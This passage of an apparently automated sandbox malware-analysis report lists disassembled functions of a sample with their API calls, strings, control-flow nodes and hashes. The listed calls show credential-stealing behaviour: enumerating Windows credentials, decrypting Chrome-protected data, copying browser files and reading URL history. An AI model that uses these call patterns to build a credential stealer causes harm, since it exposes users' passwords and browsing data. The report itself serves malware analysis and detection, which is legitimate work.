call 40a2de call 413db6 216->236 253 414925 217->253 254 41492c-414933 217->254 235 414a31-414a63 call 406cd0 call 40a2de call 40a157 218->235 235->95 267 414a65 235->267 236->199 253->254 254->218 259 41494d-4149bf memset call 406cd0 call 40a2de call 40b43e 254->259 256->212 277 4141f9-414212 call 409a0c 256->277 278 414a17-414a24 call 40b477 259->278 263->71 267->193 277->212 282 4149c1-4149ce call 40b3fa 278->282 283 414a26-414a2c call 40b4e4 278->283 282->278 287 4149d0-414a02 call 406cd0 call 40a2de call 40a157 282->287 283->235 287->278 294 414a04-414a12 call 44653e 287->294 294->278
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 00413FEF
                                                                                                                                                        • wcsrchr.MSVCRT ref: 00414007
                                                                                                                                                        • memset.MSVCRT ref: 0041413A
                                                                                                                                                        • memset.MSVCRT ref: 00414152
                                                                                                                                                          • Part of subcall function 0040CC16: _wcslwr.MSVCRT ref: 0040CCC5
                                                                                                                                                          • Part of subcall function 0040CC16: wcslen.MSVCRT ref: 0040CCDA
                                                                                                                                                          • Part of subcall function 0040B8EC: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040B925
                                                                                                                                                          • Part of subcall function 0040B8EC: wcslen.MSVCRT ref: 0040B942
                                                                                                                                                          • Part of subcall function 0040B8EC: wcsncmp.MSVCRT ref: 0040B974
                                                                                                                                                          • Part of subcall function 0040B8EC: memset.MSVCRT ref: 0040B9CD
                                                                                                                                                          • Part of subcall function 0040B8EC: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040B9EE
                                                                                                                                                          • Part of subcall function 0041607F: GetProcAddress.KERNEL32(?,00000000), ref: 004160B2
                                                                                                                                                        • memset.MSVCRT ref: 0041416A
                                                                                                                                                        • memset.MSVCRT ref: 00414182
                                                                                                                                                        • memset.MSVCRT ref: 004142F8
                                                                                                                                                        • memset.MSVCRT ref: 00414310
                                                                                                                                                        • memset.MSVCRT ref: 0041439B
                                                                                                                                                        • memset.MSVCRT ref: 00414448
                                                                                                                                                        • memset.MSVCRT ref: 00414460
                                                                                                                                                        • memset.MSVCRT ref: 004144DA
                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00414820
                                                                                                                                                          • Part of subcall function 004010A6: CopyFileW.KERNEL32(?,?,00000000,?,?), ref: 004011E4
                                                                                                                                                          • Part of subcall function 004010A6: memset.MSVCRT ref: 00401208
                                                                                                                                                          • Part of subcall function 004010A6: DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00401499
                                                                                                                                                        • memset.MSVCRT ref: 00414590
                                                                                                                                                          • Part of subcall function 00416B94: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00416BCE
                                                                                                                                                        • memset.MSVCRT ref: 0041461C
                                                                                                                                                        • memset.MSVCRT ref: 00414634
                                                                                                                                                        • memset.MSVCRT ref: 0041464C
                                                                                                                                                        • memset.MSVCRT ref: 00414765
                                                                                                                                                        • memset.MSVCRT ref: 0041477D
                                                                                                                                                        • memset.MSVCRT ref: 004144F2
                                                                                                                                                          • Part of subcall function 004010A6: memset.MSVCRT ref: 004010D3
                                                                                                                                                          • Part of subcall function 004010A6: wcsrchr.MSVCRT ref: 004010EF
                                                                                                                                                          • Part of subcall function 004010A6: memset.MSVCRT ref: 0040110D
                                                                                                                                                          • Part of subcall function 004010A6: memset.MSVCRT ref: 004011AC
                                                                                                                                                          • Part of subcall function 004010A6: CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 004011C3
                                                                                                                                                          • Part of subcall function 0040B3FA: wcscmp.MSVCRT ref: 0040B419
                                                                                                                                                          • Part of subcall function 0040B3FA: wcscmp.MSVCRT ref: 0040B42A
                                                                                                                                                        • memset.MSVCRT ref: 004143B3
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2E8
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2F2
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscpy.MSVCRT ref: 0040A306
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscat.MSVCRT ref: 0040A314
                                                                                                                                                          • Part of subcall function 0040A157: GetFileAttributesW.KERNELBASE(?,0040DF98,?,0040E04F,00000000,?,00000000,00000208,?), ref: 0040A15B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$Filewcslen$wcscmpwcsrchr$AddressAttributesCopyCreateCredDeleteEnumerateFolderPathProcSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                        • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                        • API String ID: 241508006-3798722523
                                                                                                                                                        • Opcode ID: b227ea8de1fefab8d68ff4433db62ad9ea1528c89fddca809f1fa64c36be4a22
                                                                                                                                                        • Instruction ID: 160b922070d72b691ae3132d21ec35459ff4d79c06758521881ebd4265f3e304
                                                                                                                                                        • Opcode Fuzzy Hash: b227ea8de1fefab8d68ff4433db62ad9ea1528c89fddca809f1fa64c36be4a22
                                                                                                                                                        • Instruction Fuzzy Hash: 785276B2900219ABDB10EB51CD46EDFB77CAF45344F0501BBF508A6192EB385E948B9E
                                                                                                                                                        Function 004122BA Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004053E1: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,004122D2,00000000,?,00000002,?,00446AC4,00000000,?,0000000A), ref: 00405400
                                                                                                                                                          • Part of subcall function 004053E1: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00405412
                                                                                                                                                          • Part of subcall function 004053E1: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,004122D2,00000000,?,00000002,?,00446AC4,00000000,?,0000000A), ref: 00405426
                                                                                                                                                          • Part of subcall function 004053E1: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00405451
                                                                                                                                                        • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,00446AC4,00000000,?,0000000A), ref: 004122E6
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00416ACC,00000000,?,00000002,?,00446AC4,00000000,?,0000000A), ref: 004122FF
                                                                                                                                                        • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 00412306
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                        • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                        • API String ID: 2744995895-28296030
                                                                                                                                                        • Opcode ID: a23a53bd30f639ab6e593c7dcdfa98b0c8a8014cf9dc6c45a60d320dd2194cd3
                                                                                                                                                        • Instruction ID: 2178966f4a80c8fc13f983811a773bf45d976ad6511b0e23f4840dc4cb99dd1b
                                                                                                                                                        • Opcode Fuzzy Hash: a23a53bd30f639ab6e593c7dcdfa98b0c8a8014cf9dc6c45a60d320dd2194cd3
                                                                                                                                                        • Instruction Fuzzy Hash: 01519D71508345ABC720AFA2CD4899F77A8FF85348F40083EFA45E2151DB79D8558B6A
                                                                                                                                                        Function 004010A6 Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 387fileCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 004010D3
                                                                                                                                                          • Part of subcall function 0040A22F: wcscpy.MSVCRT ref: 0040A234
                                                                                                                                                          • Part of subcall function 0040A22F: wcsrchr.MSVCRT ref: 0040A23C
                                                                                                                                                        • wcsrchr.MSVCRT ref: 004010EF
                                                                                                                                                        • memset.MSVCRT ref: 0040110D
                                                                                                                                                        • memset.MSVCRT ref: 004011AC
                                                                                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 004011C3
                                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?), ref: 004011E4
                                                                                                                                                        • CloseHandle.KERNELBASE(00000000,?,?), ref: 004011EF
                                                                                                                                                        • memset.MSVCRT ref: 00401208
                                                                                                                                                        • memset.MSVCRT ref: 0040127E
                                                                                                                                                        • memcmp.MSVCRT(?,v10,00000003), ref: 00401373
                                                                                                                                                          • Part of subcall function 00407687: GetProcAddress.KERNEL32(0045EC00,00000000), ref: 004076B7
                                                                                                                                                          • Part of subcall function 00407687: FreeLibrary.KERNEL32(00000000,00000141,?,-000000FB,?,004016C4,?,00000000,00000000,?), ref: 004076DA
                                                                                                                                                          • Part of subcall function 00407687: CryptUnprotectData.CRYPT32(-000000FB,00000000,-000000FB,00000000,00000000,-000000FB,-000000FB), ref: 004076FC
                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00401499
                                                                                                                                                        • memset.MSVCRT ref: 00401507
                                                                                                                                                        • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040151A
                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00401541
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                                                                                                        • String ID: chp$v10
                                                                                                                                                        • API String ID: 1297422669-2783969131
                                                                                                                                                        • Opcode ID: b514bb59bfc53d624b8cafe0ce1b0ddb728e252bcecfd9585c573925251d1e23
                                                                                                                                                        • Instruction ID: f518f8cdbbaa5cc0a15761cad5a7de08cb03170c242fb237df98171784d43b0b
                                                                                                                                                        • Opcode Fuzzy Hash: b514bb59bfc53d624b8cafe0ce1b0ddb728e252bcecfd9585c573925251d1e23
                                                                                                                                                        • Instruction Fuzzy Hash: 26D18472D00218AFEB10EB95DC81EEE77B8AF04314F1144BAF515F7292DA785F848B99
                                                                                                                                                        Function 0040BD7C Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040BAE3: memset.MSVCRT ref: 0040BB0B
                                                                                                                                                          • Part of subcall function 0040BAE3: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040BB32
                                                                                                                                                          • Part of subcall function 0040BAE3: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040BB73
                                                                                                                                                          • Part of subcall function 0040BAE3: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040BB9C
                                                                                                                                                          • Part of subcall function 0040BAE3: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040BBA7
                                                                                                                                                          • Part of subcall function 0040BAE3: _wcsicmp.MSVCRT ref: 0040BC10
                                                                                                                                                          • Part of subcall function 0040B5F5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040700C), ref: 0040B5FE
                                                                                                                                                        • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040BDF1
                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040BE10
                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040BE1D
                                                                                                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 0040BE32
                                                                                                                                                          • Part of subcall function 0040A004: GetTempPathW.KERNEL32(00000104,?,?), ref: 0040A01B
                                                                                                                                                          • Part of subcall function 0040A004: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040A02D
                                                                                                                                                          • Part of subcall function 0040A004: GetTempFileNameW.KERNELBASE(?,004011DE,00000000,?), ref: 0040A044
                                                                                                                                                          • Part of subcall function 00409C9B: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,00410072,00000000,?,004122A5,00000000,00000000,?,00000000,00000000), ref: 00409CAD
                                                                                                                                                        • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040BE5C
                                                                                                                                                        • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040BE71
                                                                                                                                                        • WriteFile.KERNELBASE(00000000,00000000,00000104,0040C401,00000000), ref: 0040BE8C
                                                                                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 0040BE93
                                                                                                                                                        • CloseHandle.KERNELBASE(?), ref: 0040BE9C
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040BEA1
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0040BEA6
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0040BEAB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                        • String ID: bhv
                                                                                                                                                        • API String ID: 4234240956-2689659898
                                                                                                                                                        • Opcode ID: 131e7068980ec65edbb2b84da51a09623bafa4f0fcb63a4d56c059ca8b9c60f2
                                                                                                                                                        • Instruction ID: 81637e7f8efa5e62e8569a4f404239e6b0c8c80861be29ec9ae91375cb438629
                                                                                                                                                        • Opcode Fuzzy Hash: 131e7068980ec65edbb2b84da51a09623bafa4f0fcb63a4d56c059ca8b9c60f2
                                                                                                                                                        • Instruction Fuzzy Hash: 26411676900218FBCF119FA1CC499DFBFB9EF09750F108026FA04A6251D7749A44DBE9
                                                                                                                                                        Function 0041599C Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 571 41599c-41599f 572 4159a1-4159a7 call 40ae2a 571->572 573 4159f2 571->573 575 4159ac-4159f1 GetProcAddress * 5 572->575 575->573
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040AE2A: memset.MSVCRT ref: 0040AE4A
                                                                                                                                                          • Part of subcall function 0040AE2A: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
                                                                                                                                                          • Part of subcall function 0040AE2A: wcscpy.MSVCRT ref: 0040AE7A
                                                                                                                                                          • Part of subcall function 0040AE2A: wcscat.MSVCRT ref: 0040AE90
                                                                                                                                                          • Part of subcall function 0040AE2A: LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
                                                                                                                                                          • Part of subcall function 0040AE2A: LoadLibraryW.KERNEL32(?), ref: 0040AEAA
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 004159BC
                                                                                                                                                        • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 004159C8
                                                                                                                                                        • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 004159D4
                                                                                                                                                        • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 004159E0
                                                                                                                                                        • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 004159EC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                        • API String ID: 2941347001-70141382
                                                                                                                                                        • Opcode ID: 8d8171eaa7233f23c424eae13fe9b2c2f689341781acc4346e714e5fd4705eee
                                                                                                                                                        • Instruction ID: 12a6a4dc47c8e0d72b77561104e235da68e0514af3b1e08ca0077668fc786df3
                                                                                                                                                        • Opcode Fuzzy Hash: 8d8171eaa7233f23c424eae13fe9b2c2f689341781acc4346e714e5fd4705eee
                                                                                                                                                        • Instruction Fuzzy Hash: 11F012B4840B00AACB306F759818B1ABEE0EF98701B218C2EE8C093651DBB9A044CF49
                                                                                                                                                        Function 0044692C Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 576 44692c-446946 call 446b3c GetModuleHandleA 579 446967-44696a 576->579 580 446948-446953 576->580 582 446993-4469e2 __set_app_type __p__fmode __p__commode call 402f19 579->582 580->579 581 446955-44695e 580->581 584 446960-446965 581->584 585 44697f-446983 581->585 591 4469e4-4469ef __setusermatherr 582->591 592 4469f0-446a46 call 446b28 _initterm __wgetmainargs _initterm 582->592 584->579 588 44696c-446973 584->588 585->579 586 446985-446987 585->586 590 44698d-446990 586->590 588->579 589 446975-44697d 588->589 589->590 590->582 591->592 595 446a56-446a5d 592->595 596 446a48-446a51 592->596 598 446aa4-446aa8 595->598 599 446a5f-446a6a 595->599 597 446b10-446b15 call 446b75 596->597 600 446a7d-446a83 598->600 601 446aaa-446aaf 598->601 602 446a72-446a76 599->602 603 446a6c-446a70 599->603 607 446a85-446a89 600->607 608 446a8b-446a9c GetStartupInfoW 600->608 601->598 602->600 605 446a78-446a7a 602->605 603->599 603->602 605->600 607->605 607->608 609 446ab1-446ab3 608->609 610 446a9e-446aa2 608->610 611 446ab4-446acc GetModuleHandleA call 4122ba 609->611 610->611 614 446ad5-446b0e _cexit 611->614 615 446ace-446acf exit 611->615 614->597 615->614
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2827331108-0
                                                                                                                                                        • Opcode ID: bed64be1af292bd851980aaafa98510c34be8557dbabbe7686d3cd671069d409
                                                                                                                                                        • Instruction ID: bb7a70230f37617634207b9b7a32dcb89b9454a8d8bf9e63e77bc0a4be8b0e92
                                                                                                                                                        • Opcode Fuzzy Hash: bed64be1af292bd851980aaafa98510c34be8557dbabbe7686d3cd671069d409
                                                                                                                                                        • Instruction Fuzzy Hash: CA519FB1D00714EAEB209F64D848AAE7BF0EB0A715F21813BE451E7291D7788885CB5A
                                                                                                                                                        Function 0040C722 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 0040C746
                                                                                                                                                          • Part of subcall function 00416B94: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00416BCE
                                                                                                                                                          • Part of subcall function 0040C34B: memset.MSVCRT ref: 0040C36D
                                                                                                                                                          • Part of subcall function 0040C34B: memset.MSVCRT ref: 0040C387
                                                                                                                                                          • Part of subcall function 0040B5F5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040700C), ref: 0040B5FE
                                                                                                                                                        • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C7BB
                                                                                                                                                        • wcschr.MSVCRT ref: 0040C7D2
                                                                                                                                                        • wcschr.MSVCRT ref: 0040C7F2
                                                                                                                                                        • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C817
                                                                                                                                                        • GetLastError.KERNEL32 ref: 0040C821
                                                                                                                                                        • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C84D
                                                                                                                                                        • FindCloseUrlCache.WININET(?), ref: 0040C85E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                        • String ID: visited:
                                                                                                                                                        • API String ID: 2470578098-1702587658
                                                                                                                                                        • Opcode ID: d051b6bee11d765b52f56e7531097d9158d55cb802cc7655925d0cc4dd98efa9
                                                                                                                                                        • Instruction ID: 636e8e32e5b1bb4d98569f2fcce6fed8f1b817539a9b6f5200b068eacb01c51d
                                                                                                                                                        • Opcode Fuzzy Hash: d051b6bee11d765b52f56e7531097d9158d55cb802cc7655925d0cc4dd98efa9
                                                                                                                                                        • Instruction Fuzzy Hash: 90419776D00219EBDB10EF95CC85AAFBB78EF45714F10017AE904F7281D738AA45CBA9
                                                                                                                                                        Function 0040BED3 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 642 40bed3-40beff call 408199 call 4083cc 647 40bf05-40bf43 memset 642->647 648 40bff7-40c006 call 4081df 642->648 650 40bf46-40bf58 call 4086cb 647->650 654 40bf5a-40bf77 call 40baae * 2 650->654 655 40bfce-40bfdb call 40838f 650->655 654->655 666 40bf79-40bf7b 654->666 655->650 660 40bfe1-40bfe4 655->660 662 40bfe6-40bfee free 660->662 663 40bfef-40bff2 call 40b02a 660->663 662->663 663->648 666->655 667 40bf7d-40bf93 call 408c6a 666->667 667->655 670 40bf95-40bfa0 call 40b109 667->670 670->655 673 40bfa2-40bfc9 _snwprintf call 40aef6 670->673 673->655
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004083CC: _wcsicmp.MSVCRT ref: 004083FD
                                                                                                                                                        • memset.MSVCRT ref: 0040BF1B
                                                                                                                                                          • Part of subcall function 004086CB: memset.MSVCRT ref: 004087C7
                                                                                                                                                        • free.MSVCRT ref: 0040BFE9
                                                                                                                                                          • Part of subcall function 0040BAAE: _wcsicmp.MSVCRT ref: 0040BAC7
                                                                                                                                                          • Part of subcall function 0040B109: wcslen.MSVCRT ref: 0040B118
                                                                                                                                                          • Part of subcall function 0040B109: _memicmp.MSVCRT ref: 0040B146
                                                                                                                                                        • _snwprintf.MSVCRT ref: 0040BFB5
                                                                                                                                                          • Part of subcall function 0040AEF6: wcslen.MSVCRT ref: 0040AF08
                                                                                                                                                          • Part of subcall function 0040AEF6: free.MSVCRT ref: 0040AF2E
                                                                                                                                                          • Part of subcall function 0040AEF6: free.MSVCRT ref: 0040AF51
                                                                                                                                                          • Part of subcall function 0040AEF6: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040B39C,?,000000FF), ref: 0040AF75
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
